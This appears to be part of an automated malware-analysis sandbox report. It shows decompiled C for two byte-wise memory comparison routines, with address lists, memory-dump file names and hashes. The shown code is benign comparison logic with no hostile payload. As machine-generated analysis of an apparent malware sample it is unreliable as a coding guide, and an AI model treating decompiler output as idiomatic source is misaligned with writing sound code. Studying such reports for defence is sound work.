                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C50113(void* __edx, void* __esi) {
				signed int _t192;
				signed char _t193;
				signed char _t194;
				signed char _t195;
				signed char _t196;
				signed char _t198;
				signed int _t241;
				void* _t287;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t327;

				_t327 = __esi;
				_t287 = __edx;
				if( *((intOrPtr*)(__esi - 0x1e)) ==  *((intOrPtr*)(__edx - 0x1e))) {
					_t241 = 0;
					L15:
					if(_t241 != 0) {
						goto L2;
					}
					_t193 =  *(_t327 - 0x1a);
					if(_t193 ==  *(_t287 - 0x1a)) {
						_t241 = 0;
						L26:
						if(_t241 != 0) {
							goto L2;
						}
						_t194 =  *(_t327 - 0x16);
						if(_t194 ==  *(_t287 - 0x16)) {
							_t241 = 0;
							L37:
							if(_t241 != 0) {
								goto L2;
							}
							_t195 =  *(_t327 - 0x12);
							if(_t195 ==  *(_t287 - 0x12)) {
								_t241 = 0;
								L48:
								if(_t241 != 0) {
									goto L2;
								}
								_t196 =  *(_t327 - 0xe);
								if(_t196 ==  *(_t287 - 0xe)) {
									_t241 = 0;
									L59:
									if(_t241 != 0) {
										goto L2;
									}
									if( *(_t327 - 0xa) ==  *(_t287 - 0xa)) {
										_t241 = 0;
										L70:
										if(_t241 != 0) {
											goto L2;
										}
										_t198 =  *(_t327 - 6);
										if(_t198 ==  *(_t287 - 6)) {
											_t241 = 0;
											L81:
											if(_t241 == 0 &&  *((intOrPtr*)(_t327 - 2)) ==  *((intOrPtr*)(_t287 - 2))) {
											}
											goto L2;
										}
										_t292 = (_t198 & 0x000000ff) - ( *(_t287 - 6) & 0x000000ff);
										if(_t292 == 0) {
											L74:
											_t294 = ( *(_t327 - 5) & 0x000000ff) - ( *(_t287 - 5) & 0x000000ff);
											if(_t294 == 0) {
												L76:
												_t296 = ( *(_t327 - 4) & 0x000000ff) - ( *(_t287 - 4) & 0x000000ff);
												if(_t296 == 0) {
													L78:
													_t241 = ( *(_t327 - 3) & 0x000000ff) - ( *(_t287 - 3) & 0x000000ff);
													if(_t241 != 0) {
														_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
													}
													goto L81;
												}
												_t241 = (0 | _t296 > 0x00000000) * 2 - 1;
												if(_t241 != 0) {
													goto L2;
												}
												goto L78;
											}
											_t241 = (0 | _t294 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L76;
										}
										_t241 = (0 | _t292 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L74;
									}
									_t298 = ( *(_t327 - 0xa) & 0x000000ff) - ( *(_t287 - 0xa) & 0x000000ff);
									if(_t298 == 0) {
										L63:
										_t300 = ( *(_t327 - 9) & 0x000000ff) - ( *(_t287 - 9) & 0x000000ff);
										if(_t300 == 0) {
											L65:
											_t302 = ( *(_t327 - 8) & 0x000000ff) - ( *(_t287 - 8) & 0x000000ff);
											if(_t302 == 0) {
												L67:
												_t241 = ( *(_t327 - 7) & 0x000000ff) - ( *(_t287 - 7) & 0x000000ff);
												if(_t241 != 0) {
													_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
												}
												goto L70;
											}
											_t241 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t241 != 0) {
												goto L2;
											}
											goto L67;
										}
										_t241 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L65;
									}
									_t241 = (0 | _t298 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L63;
								}
								_t304 = (_t196 & 0x000000ff) - ( *(_t287 - 0xe) & 0x000000ff);
								if(_t304 == 0) {
									L52:
									_t306 = ( *(_t327 - 0xd) & 0x000000ff) - ( *(_t287 - 0xd) & 0x000000ff);
									if(_t306 == 0) {
										L54:
										_t308 = ( *(_t327 - 0xc) & 0x000000ff) - ( *(_t287 - 0xc) & 0x000000ff);
										if(_t308 == 0) {
											L56:
											_t241 = ( *(_t327 - 0xb) & 0x000000ff) - ( *(_t287 - 0xb) & 0x000000ff);
											if(_t241 != 0) {
												_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
											}
											goto L59;
										}
										_t241 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t241 != 0) {
											goto L2;
										}
										goto L56;
									}
									_t241 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L54;
								}
								_t241 = (0 | _t304 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L52;
							}
							_t310 = (_t195 & 0x000000ff) - ( *(_t287 - 0x12) & 0x000000ff);
							if(_t310 == 0) {
								L41:
								_t312 = ( *(_t327 - 0x11) & 0x000000ff) - ( *(_t287 - 0x11) & 0x000000ff);
								if(_t312 == 0) {
									L43:
									_t314 = ( *(_t327 - 0x10) & 0x000000ff) - ( *(_t287 - 0x10) & 0x000000ff);
									if(_t314 == 0) {
										L45:
										_t241 = ( *(_t327 - 0xf) & 0x000000ff) - ( *(_t287 - 0xf) & 0x000000ff);
										if(_t241 != 0) {
											_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
										}
										goto L48;
									}
									_t241 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t241 != 0) {
										goto L2;
									}
									goto L45;
								}
								_t241 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L43;
							}
							_t241 = (0 | _t310 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L41;
						}
						_t316 = (_t194 & 0x000000ff) - ( *(_t287 - 0x16) & 0x000000ff);
						if(_t316 == 0) {
							L30:
							_t318 = ( *(_t327 - 0x15) & 0x000000ff) - ( *(_t287 - 0x15) & 0x000000ff);
							if(_t318 == 0) {
								L32:
								_t320 = ( *(_t327 - 0x14) & 0x000000ff) - ( *(_t287 - 0x14) & 0x000000ff);
								if(_t320 == 0) {
									L34:
									_t241 = ( *(_t327 - 0x13) & 0x000000ff) - ( *(_t287 - 0x13) & 0x000000ff);
									if(_t241 != 0) {
										_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
									}
									goto L37;
								}
								_t241 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t241 != 0) {
									goto L2;
								}
								goto L34;
							}
							_t241 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L32;
						}
						_t241 = (0 | _t316 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L30;
					}
					_t322 = (_t193 & 0x000000ff) - ( *(_t287 - 0x1a) & 0x000000ff);
					if(_t322 == 0) {
						L19:
						_t324 = ( *(_t327 - 0x19) & 0x000000ff) - ( *(_t287 - 0x19) & 0x000000ff);
						if(_t324 == 0) {
							L21:
							_t326 = ( *(_t327 - 0x18) & 0x000000ff) - ( *(_t287 - 0x18) & 0x000000ff);
							if(_t326 == 0) {
								L23:
								_t241 = ( *(_t327 - 0x17) & 0x000000ff) - ( *(_t287 - 0x17) & 0x000000ff);
								if(_t241 != 0) {
									_t241 = (0 | _t241 > 0x00000000) * 2 - 1;
								}
								goto L26;
							}
							_t241 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t241 != 0) {
								goto L2;
							}
							goto L23;
						}
						_t241 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t241 != 0) {
							goto L2;
						}
						goto L21;
					}
					_t241 = (0 | _t322 > 0x00000000) * 2 - 1;
					if(_t241 != 0) {
						goto L2;
					}
					goto L19;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}






























                                            0x00c50113
                                            0x00c50113
                                            0x00c50119
                                            0x00c501a0
                                            0x00c501a2
                                            0x00c501a4
                                            0x00000000
                                            0x00000000
                                            0x00c501aa
                                            0x00c501b0
                                            0x00c50237
                                            0x00c50239
                                            0x00c5023b
                                            0x00000000
                                            0x00000000
                                            0x00c50241
                                            0x00c50247
                                            0x00c502ce
                                            0x00c502d0
                                            0x00c502d2
                                            0x00000000
                                            0x00000000
                                            0x00c502d8
                                            0x00c502de
                                            0x00c50365
                                            0x00c50367
                                            0x00c50369
                                            0x00000000
                                            0x00000000
                                            0x00c5036f
                                            0x00c50375
                                            0x00c503fc
                                            0x00c503fe
                                            0x00c50400
                                            0x00000000
                                            0x00000000
                                            0x00c5040c
                                            0x00c50494
                                            0x00c50496
                                            0x00c50498
                                            0x00000000
                                            0x00000000
                                            0x00c5049e
                                            0x00c504a4
                                            0x00c5052b
                                            0x00c5052d
                                            0x00c5052f
                                            0x00c5052f
                                            0x00000000
                                            0x00c5052f
                                            0x00c504b1
                                            0x00c504b3
                                            0x00c504cb
                                            0x00c504d3
                                            0x00c504d5
                                            0x00c504ed
                                            0x00c504f5
                                            0x00c504f7
                                            0x00c5050f
                                            0x00c50517
                                            0x00c50519
                                            0x00c50522
                                            0x00c50522
                                            0x00000000
                                            0x00c50519
                                            0x00c50500
                                            0x00c50509
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50509
                                            0x00c504de
                                            0x00c504e7
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c504e7
                                            0x00c504bc
                                            0x00c504c5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c504c5
                                            0x00c5041a
                                            0x00c5041c
                                            0x00c50434
                                            0x00c5043c
                                            0x00c5043e
                                            0x00c50456
                                            0x00c5045e
                                            0x00c50460
                                            0x00c50478
                                            0x00c50480
                                            0x00c50482
                                            0x00c5048b
                                            0x00c5048b
                                            0x00000000
                                            0x00c50482
                                            0x00c50469
                                            0x00c50472
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50472
                                            0x00c50447
                                            0x00c50450
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50450
                                            0x00c50425
                                            0x00c5042e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5042e
                                            0x00c50382
                                            0x00c50384
                                            0x00c5039c
                                            0x00c503a4
                                            0x00c503a6
                                            0x00c503be
                                            0x00c503c6
                                            0x00c503c8
                                            0x00c503e0
                                            0x00c503e8
                                            0x00c503ea
                                            0x00c503f3
                                            0x00c503f3
                                            0x00000000
                                            0x00c503ea
                                            0x00c503d1
                                            0x00c503da
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c503da
                                            0x00c503af
                                            0x00c503b8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c503b8
                                            0x00c5038d
                                            0x00c50396
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50396
                                            0x00c502eb
                                            0x00c502ed
                                            0x00c50305
                                            0x00c5030d
                                            0x00c5030f
                                            0x00c50327
                                            0x00c5032f
                                            0x00c50331
                                            0x00c50349
                                            0x00c50351
                                            0x00c50353
                                            0x00c5035c
                                            0x00c5035c
                                            0x00000000
                                            0x00c50353
                                            0x00c5033a
                                            0x00c50343
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50343
                                            0x00c50318
                                            0x00c50321
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50321
                                            0x00c502f6
                                            0x00c502ff
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c502ff
                                            0x00c50254
                                            0x00c50256
                                            0x00c5026e
                                            0x00c50276
                                            0x00c50278
                                            0x00c50290
                                            0x00c50298
                                            0x00c5029a
                                            0x00c502b2
                                            0x00c502ba
                                            0x00c502bc
                                            0x00c502c5
                                            0x00c502c5
                                            0x00000000
                                            0x00c502bc
                                            0x00c502a3
                                            0x00c502ac
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c502ac
                                            0x00c50281
                                            0x00c5028a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5028a
                                            0x00c5025f
                                            0x00c50268
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50268
                                            0x00c501bd
                                            0x00c501bf
                                            0x00c501d7
                                            0x00c501df
                                            0x00c501e1
                                            0x00c501f9
                                            0x00c50201
                                            0x00c50203
                                            0x00c5021b
                                            0x00c50223
                                            0x00c50225
                                            0x00c5022e
                                            0x00c5022e
                                            0x00000000
                                            0x00c50225
                                            0x00c5020c
                                            0x00c50215
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50215
                                            0x00c501ea
                                            0x00c501f3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c501f3
                                            0x00c501c8
                                            0x00c501d1
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5011f
                                            0x00c5011f
                                            0x00c50126
                                            0x00c50128
                                            0x00c50140
                                            0x00c50140
                                            0x00c50148
                                            0x00c5014a
                                            0x00c50162
                                            0x00c50162
                                            0x00c5016a
                                            0x00c5016c
                                            0x00c50184
                                            0x00c50184
                                            0x00c5018c
                                            0x00c5018e
                                            0x00c50197
                                            0x00c50197
                                            0x00000000
                                            0x00c5018e
                                            0x00c50172
                                            0x00c50175
                                            0x00c5017e
                                            0x00c4fcd6
                                            0x00c4fcd6
                                            0x00c50ac7
                                            0x00c50ac7
                                            0x00000000
                                            0x00c5017e
                                            0x00c50150
                                            0x00c50153
                                            0x00c5015c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5015c
                                            0x00c5012e
                                            0x00c50131
                                            0x00c5013a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5013a

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                            • Instruction ID: 18d1c947ef533fc2aa284fc868bb46bfa92c499a7f257c48d16a55ceacf14322
                                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                            • Instruction Fuzzy Hash: 6EC1B9762050670ADF2D463A857403FBBA16EA17B232A076DDCB3CB0D5FE20C669D524
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C50548, Relevance: .3, Instructions: 341COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C50548(void* __edx, void* __esi) {
				signed int _t197;
				signed char _t198;
				signed char _t199;
				signed char _t200;
				signed char _t202;
				signed char _t203;
				signed int _t246;
				void* _t294;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t329;
				void* _t331;
				void* _t333;
				void* _t335;
				void* _t336;

				_t336 = __esi;
				_t294 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t246 = 0;
					L14:
					if(_t246 != 0) {
						goto L1;
					}
					_t198 =  *(_t336 - 0x1b);
					if(_t198 ==  *(_t294 - 0x1b)) {
						_t246 = 0;
						L25:
						if(_t246 != 0) {
							goto L1;
						}
						_t199 =  *(_t336 - 0x17);
						if(_t199 ==  *(_t294 - 0x17)) {
							_t246 = 0;
							L36:
							if(_t246 != 0) {
								goto L1;
							}
							_t200 =  *(_t336 - 0x13);
							if(_t200 ==  *(_t294 - 0x13)) {
								_t246 = 0;
								L47:
								if(_t246 != 0) {
									goto L1;
								}
								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}
































                                            0x00c50548
                                            0x00c50548
                                            0x00c5054e
                                            0x00c505d6
                                            0x00c505d8
                                            0x00c505da
                                            0x00000000
                                            0x00000000
                                            0x00c505e0
                                            0x00c505e6
                                            0x00c5066d
                                            0x00c5066f
                                            0x00c50671
                                            0x00000000
                                            0x00000000
                                            0x00c50677
                                            0x00c5067d
                                            0x00c50704
                                            0x00c50706
                                            0x00c50708
                                            0x00000000
                                            0x00000000
                                            0x00c5070e
                                            0x00c50714
                                            0x00c5079b
                                            0x00c5079d
                                            0x00c5079f
                                            0x00000000
                                            0x00000000
                                            0x00c507ab
                                            0x00c50833
                                            0x00c50835
                                            0x00c50837
                                            0x00000000
                                            0x00000000
                                            0x00c5083d
                                            0x00c50843
                                            0x00c508ca
                                            0x00c508cc
                                            0x00c508ce
                                            0x00000000
                                            0x00000000
                                            0x00c508d4
                                            0x00c508da
                                            0x00c50961
                                            0x00c50963
                                            0x00c50965
                                            0x00000000
                                            0x00000000
                                            0x00c50973
                                            0x00c50975
                                            0x00c5098d
                                            0x00c50995
                                            0x00c50997
                                            0x00c500f0
                                            0x00c500f8
                                            0x00c500fa
                                            0x00c50107
                                            0x00c50107
                                            0x00000000
                                            0x00c500fa
                                            0x00c509a4
                                            0x00c500ea
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c500ea
                                            0x00c5097e
                                            0x00c50987
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50987
                                            0x00c508e7
                                            0x00c508e9
                                            0x00c50901
                                            0x00c50909
                                            0x00c5090b
                                            0x00c50923
                                            0x00c5092b
                                            0x00c5092d
                                            0x00c50945
                                            0x00c5094d
                                            0x00c5094f
                                            0x00c50958
                                            0x00c50958
                                            0x00000000
                                            0x00c5094f
                                            0x00c50936
                                            0x00c5093f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5093f
                                            0x00c50914
                                            0x00c5091d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c5091d
                                            0x00c508f2
                                            0x00c508fb
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c508fb
                                            0x00c50850
                                            0x00c50852
                                            0x00c5086a
                                            0x00c50872
                                            0x00c50874
                                            0x00c5088c
                                            0x00c50894
                                            0x00c50896
                                            0x00c508ae
                                            0x00c508b6
                                            0x00c508b8
                                            0x00c508c1
                                            0x00c508c1
                                            0x00000000
                                            0x00c508b8
                                            0x00c5089f
                                            0x00c508a8
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c508a8
                                            0x00c5087d
                                            0x00c50886
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50886
                                            0x00c5085b
                                            0x00c50864
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50864
                                            0x00c507b9
                                            0x00c507bb
                                            0x00c507d3
                                            0x00c507db
                                            0x00c507dd
                                            0x00c507f5
                                            0x00c507fd
                                            0x00c507ff
                                            0x00c50817
                                            0x00c5081f
                                            0x00c50821
                                            0x00c5082a
                                            0x00c5082a
                                            0x00000000
                                            0x00c50821
                                            0x00c50808
                                            0x00c50811
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c50811
                                            0x00c507e6
                                            0x00c507ef
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00c507ef
                                            0x00c507c4
                                            0x00c507cd
